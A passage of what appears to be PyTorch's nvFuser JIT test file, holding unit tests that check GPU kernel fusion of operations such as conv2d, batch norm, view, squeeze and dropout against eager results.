jit_o = jitted(inp, 0.693147)
inp.grad = None # avoid accumulation on grad
jit_o.backward(grad)
jit_grad = inp.grad
assert torch.allclose(jit_o, aten_o)
assert torch.allclose(jit_grad, aten_grad)
self.assertGraphContains(jitted.graph_for(inp, 0.693147), FUSION_GROUP, True)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_inplace_removal(self):
def t(x: torch.Tensor):
o = torch.nn.functional.softmax(x, dim=0)
o += x
return o.relu_()
jitted = torch.jit.script(t)
inp = torch.randn(4, 2, dtype=torch.float32, device="cuda")
for i in range(3):
jit_o = jitted(inp)
graph = jitted.graph_for(inp)
self.assertGraphContains(graph, FUSION_GROUP, True)
self.assertGraphContains(graph, 'aten::add', True)
self.assertGraphContains(graph, 'aten::relu', True)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_conv2d_bias(self):
def t(x: torch.Tensor, w: torch.Tensor, bias: torch.Tensor):
o = torch.nn.functional.conv2d(x, w, bias)
return o.relu()
jitted = torch.jit.script(t)
inp = torch.randn(4, 5, 3, 3, dtype=torch.float32, device="cuda")
weight = torch.randn(2, 5, 2, 2, dtype=torch.float32, device="cuda")
bias = torch.randn(2, dtype=torch.float32, device="cuda")
for i in range(3):
jit_o = jitted(inp, weight, bias)
graph = jitted.graph_for(inp)
self.assertGraphContains(graph, FUSION_GROUP, True)
def t_not_fused(x: torch.Tensor, w: torch.Tensor):
o = torch.nn.functional.conv2d(x, w)
return o.relu()
jitted_not_fused = torch.jit.script(t_not_fused)
for i in range(3):
jit_o = jitted_not_fused(inp, weight)
graph = jitted_not_fused.graph_for(inp)
self.assertGraphContainsExactly(graph, FUSION_GROUP, 0)
self.assertGraphContains(graph, 'aten::relu', True)
def t_bias(x: torch.Tensor, w: torch.Tensor, bias: torch.Tensor):
o = torch.nn.functional.conv2d(x, w, bias)
return o.relu()
jitted_bias = torch.jit.script(t_bias)
for i in range(3):
jit_o = jitted_bias(inp, weight, bias)
graph = jitted_bias.graph_for(inp)
self.assertGraphContains(graph, FUSION_GROUP, True)
self.assertGraphContains(graph, 'prim::add_optional', True)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_remove_output_used_only_in_dtype(self):
class MyModule(torch.nn.Module):
def __init__(self, num_features=4):
super(MyModule, self).__init__()
self.bn0 = torch.nn.BatchNorm2d(num_features)
self.bn1 = torch.nn.BatchNorm2d(num_features)
def forward(self, x, y):
o1 = self.bn0(x)
o2 = self.bn1(y)
return torch.relu(o1 + o2)
t = MyModule(4).float().cuda()
jitted = torch.jit.script(t)
x = torch.randn(3, 4, 2, 5, dtype=torch.float32, device="cuda")
y = torch.randn(3, 4, 2, 5, dtype=torch.float32, device="cuda")
with torch.cuda.amp.autocast(True):
for i in range(5):
jit_o = jitted(x, y)
jit_o = jitted(x, y)
o = t(x, y)
self.assertTrue(torch.allclose(jit_o, o))
graph = jitted.graph_for(x, y)
self.assertGraphContains(graph, FUSION_GROUP, True)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_fix_shape_expression_bn(self):
class MyModule(torch.nn.Module):
def __init__(self, num_features=4):
super(MyModule, self).__init__()
self.bn = torch.nn.BatchNorm2d(num_features)
def forward(self, x, y):
out1 = self.bn(x)
out2 = out1 + y
out3 = torch.relu(out2)
return out3
t = MyModule(4).float().cuda()
jitted = torch.jit.script(t)
x = torch.randn(3, 4, 2, 5, dtype=torch.float32, device="cuda")
y = torch.randn(3, 4, 2, 5, dtype=torch.float32, device="cuda")
with torch.cuda.amp.autocast(True):
for i in range(5):
jit_o = jitted(x, y)
jit_o = jitted(x, y)
o = t(x, y)
self.assertTrue(torch.allclose(jit_o, o))
graph = jitted.graph_for(x, y)
self.assertGraphContains(graph, FUSION_GROUP, True)
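# Forward-only helper: scripts `func`, runs it a few times so the profiling
# executor can optimize, compares every output against eager, and checks
# that a fusion group is present while none of the listed aten ops survive
# outside of it.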
def _run_fwd_helper(self, func, ops, *args):
jitted = torch.jit.script(func)
for i in range(3):
jit_o = jitted(*args)
jit_o = jitted(*args)
o = func(*args)
for oo, jit_oo in zip(o, jit_o):
self.assertEqual(oo.dtype, jit_oo.dtype)
self.assertEqual(oo, jit_oo)
graph = jitted.graph_for(*args)
self.assertGraphContains(graph, FUSION_GROUP, True)
for op in ops:
self.assertGraphContainsExactly(graph, op, 0)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_sibling_fusion(self):
device = "cuda"
dtype = torch.float
x = torch.randn(2, 5, dtype=dtype, device=device)
y = torch.randn(2, 5, dtype=dtype, device=device)
def t(x: torch.Tensor):
o1 = x + 1.0
o2 = x * 0.5
return o1, o2
self._run_fwd_helper(t, ['aten::add', 'aten::mul'], x)
def t2(x: torch.Tensor, y: torch.Tensor):
o1 = x.sum(0)
o2 = (x * y).sum(0)
return o1, o2
self._run_fwd_helper(t2, ['aten::sum', 'aten::mul'], x, y)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_clean_profile_ivalue(self):
device = "cuda"
dtype = torch.float
x = torch.randn(2, 5, dtype=dtype, device=device, requires_grad=True)
# turn on autodiff subgraph inlining
# this is to verify that we clean up profile_ivalue nodes outside of
# the fusion code path.
torch._C._debug_set_autodiff_subgraph_inlining(True)
def t(x: torch.Tensor, flag: bool):
return torch.dropout(x, 0.5, flag)
jit_t = torch.jit.script(t)
for idx in range(5):
out = jit_t(x, True)
graph = jit_t.graph_for(x, True)
out = jit_t(x, False)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_sibling_fusion_no_scalar_inputs(self):
device = "cuda"
dtype = torch.float
x = torch.randn(2, 5, dtype=dtype, device=device)
y = torch.randn(3, dtype=dtype, device=device)
# no tensor dependency between o1/o2, we shouldn't be fusing them
def t(x: torch.Tensor, y: torch.Tensor):
o1 = x + 1
o2 = y - 1
return o1, o2
jitted = torch.jit.script(t)
for i in range(3):
jit_o = jitted(x, y)
graph = jitted.graph_for(x, y)
self.assertGraphContainsExactly(graph, FUSION_GROUP, 0)
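# The two view helpers below exercise add + view + relu. The plain variant
# compares the scripted module against eager and, while aten::view fusion is
# disabled (see the TODO), expects no fusion group in the optimized graph;
# the aliasing variant mutates its input in-place after the view, which must
# block both fusion and view_copy insertion entirely.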
def _bias_view_relu_helper(self, shape, output_shape, dtype, device, error):
class BiasViewRelu(torch.nn.Module):
def __init__(self):
super(BiasViewRelu, self).__init__()
self.bias = torch.nn.Parameter(torch.randn(shape, dtype=dtype, device=device), requires_grad=False)
with torch.no_grad():
self.bias.fill_(10)
def forward(self, inputs : torch.Tensor, view_shape : List[int]):
o = inputs + self.bias
o = o.view(view_shape)
return torch.relu(o)
t = BiasViewRelu()
x = torch.randn(shape, dtype=dtype, device=device, requires_grad=False)
t_jit = torch.jit.script(t)
# profiling
jit_o = t_jit(x, output_shape)
# optimization
jit_o = t_jit(x, output_shape)
# final
jit_o = t_jit(x, output_shape)
# eager - baseline
o = t(x, output_shape)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("comparing output failed", o, jit_o, error))
graph = t_jit.graph_for(x, output_shape)
# TODO: revert disabled aten::view
# has_inferred_dimension = any([dim == -1 for dim in output_shape])
has_inferred_dimension = True
if has_inferred_dimension:
# prohibit fusing when view_shape contains an inferred dimension
self.assertGraphContainsExactly(graph, FUSION_GROUP, 0)
self.assertGraphContainsExactly(graph, 'prim::view_copy', 0)
else:
self.assertGraphContains(graph, FUSION_GUARD)
self.assertGraphContains(graph, 'prim::view_copy', True)
def _alias_bias_view_relu_helper(self, shape, output_shape, dtype, device, error):
class BiasViewRelu(torch.nn.Module):
def __init__(self):
super(BiasViewRelu, self).__init__()
self.bias = torch.nn.Parameter(torch.randn(shape, dtype=dtype, device=device), requires_grad=False)
with torch.no_grad():
self.bias.fill_(10)
def forward(self, inputs : torch.Tensor, bias : torch.Tensor, view_shape : List[int]):
o = inputs.view(view_shape)
inputs.add_(bias)
return torch.relu(o)
t = BiasViewRelu()
x = torch.randn(shape, dtype=dtype, device=device, requires_grad=False)
bias = torch.randn(shape, dtype=dtype, device=device, requires_grad=False)
t_jit = torch.jit.script(t)
# profiling
jit_o = t_jit(x.clone(), bias, output_shape)
# optimization
jit_o = t_jit(x.clone(), bias, output_shape)
# final
jit_o = t_jit(x.clone(), bias, output_shape)
# eager - baseline
o = t(x.clone(), bias, output_shape)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("comparing output failed", o, jit_o, error))
graph = t_jit.graph_for(x, bias, output_shape)
self.assertGraphContainsExactly(graph, FUSION_GUARD, 0)
self.assertGraphContainsExactly(graph, 'prim::view_copy', 0)
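# _random_view below performs a bounded depth-first search over shape
# transformations (keep / merge / split / broadcast / implicit broadcast)
# starting from the original view, and records every generated shape whose
# element count still matches the original, yielding a pool of
# view-compatible shapes to sample from.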
# generate random view given original view
def _random_view(self, original_view, max_len=8, max_views=10000):
class Moves(enum.Enum):
Merge = 0
Split = 1
Broadcast = 2
ImplicitBroadcast = 3
Keep = 4
def valid(old_view, new_view):
old_view_size = reduce(operator.mul, old_view)
new_view_size = reduce(operator.mul, new_view)
return old_view_size == new_view_size
# given a random starting number, find the nearest divisor
def find_nearest_divisor(N):
if 2 >= (N - 1):
return -1
result = random.randint(2, N - 1)
while (N % result) != 0:
result += 1
return result
complete_views = set([tuple(original_view)])
to_visit = []
# empty new view, current original view, start pos=0, move count = 0, last_move
to_visit.append(([], original_view, 0, [], Moves.Keep))
# depth-first search of view shapes, starting from the original view
while len(to_visit) > 0 and len(complete_views) < max_views:
new_view, old_view, odx, move_list, last_move = to_visit[-1]
to_visit.pop()
# iterate over each move type
for idx in range(len(Moves)):
state = Moves(idx)
new_view_clone = copy.deepcopy(new_view)
old_view_clone = copy.deepcopy(old_view)
new_move_list = move_list + [state]
new_odx = odx
# Update state using Move state
if state == Moves.Keep:
new_size = old_view_clone[odx]
new_view_clone.append(new_size)
new_odx += 1
elif state == Moves.Merge:
if odx + 1 < len(old_view_clone):
new_size = old_view_clone[odx] * old_view_clone[odx + 1]
new_view_clone.append(new_size)
new_odx += 2
else:
continue
elif state == Moves.Broadcast and last_move != Moves.Broadcast:
new_view_clone.append(1)
elif state == Moves.Split:
new_size = find_nearest_divisor(old_view_clone[odx])
if new_size == -1:
continue
new_view_clone.append(new_size)
old_view_clone[odx] = int(old_view[odx] / new_size)
if old_view_clone[odx] == 1:
new_odx += 1
elif state == Moves.ImplicitBroadcast:
old_view_clone.insert(odx + 1, 1)
new_size = old_view[odx] * 1
new_view_clone.append(new_size)
new_odx += 2
if new_odx < len(old_view_clone) and len(new_move_list) < max_len:
to_visit.append((new_view_clone, old_view_clone, new_odx, new_move_list, state))
elif (valid(original_view, new_view_clone)):
final_new_view = tuple(new_view_clone)
complete_views.add(final_new_view)
return list(complete_views)
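# _view_test_generator picks random dimension sizes (total element count
# capped around 1e8), draws up to 20 of the compatible views produced by
# _random_view, and runs the supplied test function on every pair of them.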
# ndims - number of dimensions
# test_fn - view test function
def _view_test_generator(self, ndims, test_fn):
# create random tensor
# max value for each dimension
max_size = 10e7
max_value = max(int(pow(max_size, 1. / ndims)), 1)
sizes = [random.randint(1, max_value) for idx in range(ndims)]
x = torch.randn(sizes)
original_sizes = list(x.size())
all_views = self._random_view(original_sizes)
random.shuffle(all_views)
max_samples = 20
max_views = min(len(all_views), max_samples)
total = 0
correct = 0
# test random combinations of compatible views
for idx in range(max_views):
for jdx in range(idx + 1, max_views):
total += 1
test_fn(all_views[idx], all_views[jdx], torch.float, 'cuda', 1e-6)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_view(self):
torch._C._jit_set_nvfuser_guard_mode(True)
self._bias_view_relu_helper([2, 3, 4, 5], [-1, 4, 5], torch.float, 'cuda', 1e-6)
for ndims in range(1, 5):
self._view_test_generator(ndims, self._bias_view_relu_helper)
self._alias_bias_view_relu_helper([2, 3, 4, 5], [1, 6, 1, 2, 2, 5, 1], torch.float, 'cuda', 1e-6)
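# torch.jit.strict_fusion() is expected to raise when ops inside the
# context are left unfused: the success case fuses the adds into a
# CudaFusionGroup, while mixing in aten::mm (not handled here) should
# surface a "Found unfused operators" error naming that op.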
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_strict_fusion(self):
def success(x):
with torch.jit.strict_fusion():
return x + x + x
scripted = self.checkScript(success, (torch.rand([4], device='cuda'),))
g = torch.jit.last_executed_optimized_graph()
FileCheck().check_not("aten::add").check("prim::CudaFusionGroup").run(g)
def failure(x):
with torch.jit.strict_fusion():
return x + torch.mm(x, x) + x
with self.assertRaises(Exception) as error_out:
foo_s = torch.jit.script(failure)
foo_s(torch.rand([4, 4]))
foo_s(torch.rand([4, 4]))
fc = FileCheck().check("Found unfused operators")
fc.check("aten::mm").run(str(error_out.exception))
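# Helper modeled after an LTC (lazy tensor) style linear layer:
# view -> mm -> view -> bias add -> redundant views -> gelu. The scripted
# module is compared against eager; with aten::view currently disabled for
# fusion the optimized graph is expected to contain neither a fusion guard
# nor a view_copy node (see the TODO).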
def _ltc_helper(self, shape, dtype, device, error, approximate=True):
# modeled after LTC linear layer
class LTC(torch.nn.Module):
def __init__(self):
super(LTC, self).__init__()
self.weight = torch.nn.Parameter(torch.randn([1024, 1024], dtype=dtype, device=device), requires_grad=False)
self.bias = torch.nn.Parameter(torch.randn([1, 1024], dtype=dtype, device=device), requires_grad=False)
def forward(self, inputs : torch.Tensor):
o = inputs.view([32768, 1024])
o = torch.mm(o, self.weight)
o = o.view([256, 128, 1024])
o = o + self.bias
o = o.view([32768, 1024])
o = o.view([256, 128, 1024])
return torch.nn.functional.gelu(o)
t = LTC()
x = torch.randn(shape, dtype=dtype, device=device, requires_grad=False)
t_jit = torch.jit.script(t)
# profile/optimization runs
for i in range(3):
jit_o = t_jit(x)
o = t(x)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("comparing output failed", o, jit_o, error))
graph = t_jit.graph_for(x)
# TODO: revert disabled aten::view
# self.assertGraphContains(graph, FUSION_GUARD)
# self.assertGraphContains(graph, 'prim::view_copy', True)
self.assertGraphContainsExactly(graph, FUSION_GUARD, 0)
self.assertGraphContainsExactly(graph, 'prim::view_copy', 0, True)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_nested_view(self):
self._ltc_helper([256, 128, 1024], torch.float, 'cuda', 1e-6)
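# Squeeze/unsqueeze counterparts of the view helpers above: the plain
# variants expect a fusion guard plus a squeeze_copy/unsqueeze_copy node,
# while the aliasing variants (in-place add on the input that was
# squeezed/unsqueezed) must not be fused at all. The corresponding tests
# are skipped for now while squeeze/unsqueeze fusion is disabled.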
def _bias_squeeze_relu_helper(self, shape, dtype, device, error):
class BiasSqueezeRelu(torch.nn.Module):
def __init__(self):
super(BiasSqueezeRelu, self).__init__()
def forward(self, inputs : torch.Tensor, bias : torch.Tensor):
o = inputs + bias
o = torch.squeeze(o)
return torch.relu(o)
t = BiasSqueezeRelu()
x = torch.randn(shape, dtype=dtype, device=device, requires_grad=False)
bias = torch.randn(shape, dtype=dtype, device=device, requires_grad=False)
t_jit = torch.jit.script(t)
jit_o = t_jit(x, bias)
jit_o = t_jit(x, bias)
jit_o = t_jit(x, bias)
o = t(x, bias)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("comparing output failed", o, jit_o, error))
graph = t_jit.graph_for(x, bias)
self.assertGraphContains(graph, FUSION_GUARD)
self.assertGraphContains(graph, 'prim::squeeze_copy', True)
def _alias_bias_squeeze_relu_helper(self, shape, dtype, device, error):
class BiasSqueezeRelu(torch.nn.Module):
def __init__(self):
super(BiasSqueezeRelu, self).__init__()
def forward(self, inputs : torch.Tensor, bias : torch.Tensor):
o = torch.squeeze(inputs)
inputs.add_(bias)
return torch.relu(o)
t = BiasSqueezeRelu()
x = torch.randn(shape, dtype=dtype, device=device, requires_grad=False)
bias = torch.randn(shape, dtype=dtype, device=device, requires_grad=False)
t_jit = torch.jit.script(t)
jit_o = t_jit(x.clone(), bias)
jit_o = t_jit(x.clone(), bias)
jit_o = t_jit(x.clone(), bias)
o = t(x.clone(), bias)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("comparing output failed", o, jit_o, error))
graph = t_jit.graph_for(x, bias)
self.assertGraphContainsExactly(graph, FUSION_GUARD, 0)
self.assertGraphContainsExactly(graph, 'prim::squeeze_copy', 0)
# TODO: revert disabled alias ops
@unittest.skipIf(True, "skipping this test since squeeze/unsqueeze is disabled now")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_squeeze(self):
self._bias_squeeze_relu_helper([1, 6, 1, 2, 2, 5, 1], torch.float, 'cuda', 1e-6)
self._alias_bias_squeeze_relu_helper([1, 6, 1, 2, 2, 5, 1], torch.float, 'cuda', 1e-6)
# TODO: revert disabled alias ops
@unittest.skipIf(True, "skipping this test since squeeze/unsqueeze is disabled now")
# remove this after opinfo tests are enabled
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_squeeze_zero(self):
x = torch.tensor(1.0, dtype=torch.float, device="cuda")
def squeeze_0(x: torch.Tensor):
o = x + 1.
o = torch.squeeze(o, 0)
o = o * 2.
return o
def squeeze_1(x: torch.Tensor):
o = x + 1.
o = torch.squeeze(o, -1)
o = o + .5
return o
squeeze_0_jit = torch.jit.script(squeeze_0)
self._run_helper(squeeze_0_jit, squeeze_0, x)
squeeze_1_jit = torch.jit.script(squeeze_1)
self._run_helper(squeeze_1_jit, squeeze_1, x)
def _bias_unsqueeze_relu_helper(self, shape, dtype, device, error):
class BiasUnsqueezeRelu(torch.nn.Module):
def __init__(self):
super(BiasUnsqueezeRelu, self).__init__()
def forward(self, inputs : torch.Tensor, bias : torch.Tensor):
o = inputs + bias
o = torch.unsqueeze(o, 0)
return torch.relu(o)
t = BiasUnsqueezeRelu()
x = torch.randn(shape, dtype=dtype, device=device, requires_grad=False)
bias = torch.randn(shape, dtype=dtype, device=device, requires_grad=False)
t_jit = torch.jit.script(t)
jit_o = t_jit(x, bias)
jit_o = t_jit(x, bias)
jit_o = t_jit(x, bias)
o = t(x, bias)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("comparing output failed", o, jit_o, error))
graph = t_jit.graph_for(x, bias)
self.assertGraphContains(graph, FUSION_GUARD)
self.assertGraphContains(graph, 'prim::unsqueeze_copy', True)
def _alias_bias_unsqueeze_relu_helper(self, shape, dtype, device, error):
class BiasUnsqueezeRelu(torch.nn.Module):
def __init__(self):
super(BiasUnsqueezeRelu, self).__init__()
def forward(self, inputs : torch.Tensor, bias : torch.Tensor):
o = torch.unsqueeze(inputs, 0)
inputs.add_(bias)
return torch.relu(o)
t = BiasUnsqueezeRelu()
x = torch.randn(shape, dtype=dtype, device=device, requires_grad=False)
bias = torch.randn(shape, dtype=dtype, device=device, requires_grad=False)
t_jit = torch.jit.script(t)
jit_o = t_jit(x.clone(), bias)
jit_o = t_jit(x.clone(), bias)
jit_o = t_jit(x.clone(), bias)
o = t(x.clone(), bias)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("comparing output failed", o, jit_o, error))
graph = t_jit.graph_for(x, bias)
self.assertGraphContainsExactly(graph, FUSION_GUARD, 0)
self.assertGraphContainsExactly(graph, 'prim::unsqueeze_copy', 0)
# TODO: revert disabled alias ops
@unittest.skipIf(True, "skipping this test since squeeze/unsqueeze is disabled now")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_unsqueeze(self):
self._bias_unsqueeze_relu_helper([2, 3, 4, 5], torch.float, 'cuda', 1e-6)
self._alias_bias_unsqueeze_relu_helper([2, 3, 4, 5], torch.float, 'cuda', 1e-6)
# TODO: revert disabled alias ops
@unittest.skipIf(True, "skipping this test since unsqueeze is disabled now")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_alias_pass_fix(self):
x = torch.randn(4, 24, 2, 2, dtype=torch.float, device="cuda")
w = torch.randn(24, 24, 1, 1, dtype=torch.float, device="cuda")
b = torch.randn(24, dtype=torch.float, device="cuda")
def t(x, w, b):
b2 = b + 1.0
o = torch.conv2d(x, w, b2)
return o
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x, w, b)
# TODO: revert disabled alias ops
@unittest.skipIf(True, "skipping this test since squeeze/unsqueeze is disabled now")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_squeeze_negative_dim(self):
x = torch.randn(4, 24, 1, 2, dtype=torch.float, device="cuda")
def t(x):
o = x + 1.0
o = o.squeeze(-2)
o = o * 2.0
return o
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_singleton_fusion(self):
x = torch.randn(4, 2, device="cuda")
with nvfuser_singleton_fusion(True):
def t(x):
return x.relu()
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_issue1445_fusion(self):
def f(t0, t1, t2, t3):
masked_input = torch.where(t1, t2, t3)
total = masked_input.sum([0, 1, 2, 3])
sizes : List[int] = []
t10 = torch.reshape(t0, sizes)
t7 = total / t10
t4 = t7.to(dtype=torch.float)
return t4
x = torch.randn(1, 1, 1, 1, device='cuda').to(dtype=torch.long)
y = torch.randn(3, 2, 1, 1, device='cuda').to(dtype=torch.bool).expand([3, 2, 1, 2])
z = torch.randn(3, 2, 1, 2, device='cuda')
w = torch.tensor(1.5, device='cuda')
f_jit = torch.jit.script(f)
for i in range(5):
out_jit = f_jit(x, y, z, w)
out = f(x, y, z, w)
self.assertEqual(out, out_jit)
self.assertGraphContainsExactly(f_jit.graph_for(x, y, z, w), FUSION_GROUP, 1)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_disable_sibling_fuse(self):
x = torch.randn(4, 2, device="cuda")
y = torch.randn(8, device="cuda")
s = torch.tensor(1.5, device="cuda")
with nvfuser_horizontal_fusion(False):
def t(x, y, s):
o1 = x + s
o2 = y + s
return o1, o2
t_jit = torch.jit.script(t)
for i in range(5):
t_jit(x, y, s)
# sibling fusion should be disabled with the flag
self.assertGraphContainsExactly(t_jit.graph_for(x, y, s), FUSION_GUARD, 0)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_build_shape_expression_native_dropout(self):
x = torch.randn(4, 2, device="cuda")
def t(x):
o, mask = torch.native_dropout(x, 0.0, True)
o1 = o.sigmoid()
o2 = mask.float().sigmoid()
return (o1, o2)
t_jit = torch.jit.script(t)
jit_o = t_jit(x)
jit_o = t_jit(x)
o = t(x)
for oo, jit_oo in zip(o, jit_o):
self.assertEqual(oo.dtype, jit_oo.dtype)
self.assertEqual(oo, jit_oo)
self.assertGraphContains(t_jit.graph_for(x), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_scalar_tensor_permuted(self):
x = torch.randn(4, 2, 3, device="cuda").permute([1, 2, 0])
y = torch.tensor(1.0, device="cuda")
with nvfuser_singleton_fusion(True):
def t(x, y):
return x + y
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x, y)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_cpu_scalar(self):
x = torch.randn(4, 2, 3, device="cuda")
y = torch.tensor(1.0, device="cpu")
z = torch.tensor(2.0, device="cpu")
with nvfuser_singleton_fusion(True):
# testing cpu scalar tensor promotion
def t(x, y):
return x + y
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x, y)
# scalar cpu tensor add should NOT be fused
@torch.jit.script
def t1(y, z):
return y * z
for _ in range(5):
t1(y, z)
self.assertGraphContainsExactly(t1.graph_for(y, z), FUSION_GUARD, 0)
# everything, including scalar cpu tensor add should be fused
@torch.jit.script
def t2(x, y, z):
tmp = y + z
return tmp + x
for _ in range(5):
t2(x, y, z)
self.assertGraphContainsExactly(t2.graph_for(x, y, z), 'aten::add', 0)
self.assertGraphContainsExactly(t2.graph_for(x, y, z), FUSION_GUARD, 1)
# 'cpu_tmp = y + z' shouldn't be fused.
@torch.jit.script
def t3(x, y, z):
cpu_tmp = y + z
out = x + y
return cpu_tmp, out
for _ in range(5):
t3(x, y, z)
self.assertGraphContainsExactly(t3.graph_for(x, y, z), FUSION_GUARD, 1)
self.assertGraphContainsExactly(t3.graph_for(x, y, z), 'aten::add', 1)
# TODO: revert disabled alias ops
@unittest.skipIf(True, "skipping this test since squeeze/unsqueeze is disabled now")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_shape_expression(self):
x = torch.randn(4, 2, 1, 3, device="cuda")
def t_unsqueeze(x):
t0 = x.relu()
t1 = t0.unsqueeze(1)
t2 = t1 + 1.0
t3 = t1.size()
return t2, t3
def t_squeeze(x):
t0 = x.relu()
t1 = t0.squeeze()
t2 = t1 + 1.0
t3 = t1.size()
return t2, t3
def t_squeeze_dim(x):
t0 = x.relu()
t1 = t0.squeeze(-2)
t2 = t1 + 1.0
t3 = t1.size()
return t2, t3
# squeezing a dimension whose size is not 1 should be a no-op
def t_squeeze_dim_no_op(x):
t0 = x.relu()
t1 = t0.squeeze(1)
t2 = t1 + 1.0
t3 = t1.size()
return t2, t3
def run(fn):
jit_fn = torch.jit.script(fn)
jit_o = jit_fn(x)
jit_o = jit_fn(x)
jit_o = jit_fn(x)
o = fn(x)
# output 0 is a tensor, so we check dtype and value
self.assertEqual(o[0].dtype, jit_o[0].dtype)
self.assertEqual(o[0], jit_o[0])
# output 1 is shape
self.assertEqual(o[1], jit_o[1])
self.assertGraphContainsExactly(jit_fn.graph_for(x), FUSION_GUARD, 1)
for t in [t_unsqueeze, t_squeeze, t_squeeze_dim, t_squeeze_dim_no_op]:
run(t)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_scalar_cuda_tensor(self):
x = torch.tensor(2.0, device="cuda")
with nvfuser_singleton_fusion(True):
def t(x):
return x + 1.0
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x)
@torch.jit.script
def t_jitted(x):
return x.sum(0)
for i in range(5):
t_jitted(x)
self.assertGraphContainsExactly(t_jitted.graph_for(x), FUSION_GUARD, 0)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_overlapped_input(self):
x = torch.randn(8, device="cuda").as_strided((2, 4), (1, 1))
with nvfuser_singleton_fusion(True):
def t(x):
return x + 1.0
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
def test_reduction_empty_axes(self):
x = torch.randn(4, 2, 3, device="cuda").permute([1, 2, 0])
